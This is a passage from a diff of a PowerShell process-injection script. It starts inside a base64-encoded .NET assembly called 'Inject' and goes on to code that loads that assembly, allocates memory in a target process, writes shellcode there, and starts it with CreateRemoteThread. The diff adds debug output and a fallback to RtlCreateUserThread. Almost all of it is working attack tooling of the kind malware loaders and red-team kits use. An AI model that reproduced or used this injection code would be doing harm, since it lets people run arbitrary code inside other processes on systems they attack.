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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAA0D8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $dl = [System.Convert]::FromBase64String($p) $a = [System.Reflection.Assembly]::Load($dl) $o = New-Object Inject @@ -57,13 +57,34 @@ while( $zz.ToInt32() -lt $max.ToInt32() ) if( $x.ToInt32() -ne $nul.ToInt32() ){ break } $zz = [Int32]$zz + $Shellcode.Length } +echo "VirtualAllocEx" +echo "[+] $x" if( $x.ToInt32() -gt $nul.ToInt32() ) { $hg = [Runtime.InteropServices.Marshal]::AllocHGlobal($Shellcode.Length) - [Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length)|Out-Null - [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0)|Out-Null - [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0)|Out-Null + [Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length) + $s = [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0) + echo "WriteProcessMemory" + echo "[+] $s" + $e = [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0) + echo "CreateRemoteThread" + echo "[+] $e" + + if ($e -eq 0) { + $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + echo "[-] Failed using CreateRemoteThread" + echo "[-] LastError: $Lasterror" + echo "" + $TokenHandle = [IntPtr]::Zero + $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0) + echo "RtlCreateUserThread" + echo "[+] $c" + } + + $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + echo "LastError: $Lasterror" } + }